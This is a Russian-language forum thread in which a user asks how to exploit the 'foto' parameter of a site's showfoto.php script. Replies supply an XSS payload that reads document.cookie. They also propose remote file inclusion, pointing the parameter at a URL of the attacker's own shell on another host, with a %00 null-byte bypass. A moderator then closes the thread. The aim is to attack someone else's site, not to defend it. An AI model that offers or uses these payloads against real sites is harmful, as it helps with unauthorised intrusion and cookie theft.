Можно ли что-то с этим сделать?
 

Ребятки помогите, подскажите можно ли что-то сделать, если есть такое:

showfoto.php?foto=/images/img.gif
Вот такая ссылка на картинку..

Когда пишу

showfoto.php?foto=">

То выводит, что картинки нету и " border=0>

Можно ли что-то прописать вредное? :)

xxs


showfoto.php?foto="><script>alert(document.cookie) </script>

возможно php-include

VectorG
XSS меня не сильно интересует, т.к. на сайте нету авторизации, вообщим нету и кукисов... так что воровать их бесмысленно )

qBiN, поделишь пожалуйста подробностями.

Во-первых будешь так называть темы получишь по башке,я модер нервный...
Во-вторых повторяю я модер нервный и не люблю переделывать два сообщения одного пользователя в одно,поэтому советую тебе сделать это(либо это сделаю я,понизив тебе репу)
В третьих RTFM
В четвертых ничо конкретного сказать не могу,скрипт не видел.
зы:вот такой я злой :-)

ссылку в студиу или в приват мне
телепатов нет!

showfoto.php?foto=/images/img.gif вместо ентого подставить showfoto.php?foto=http://адрес_твоего_шелла_на_хости нге_без_пхп хотя я думаю скрипт инклудит токо картинки..но %00 может обойти хотя древняя весчь
Матвей нехарашо!)

Автор спит тему закрываю ибо нет информативности, да и к форумам не относится.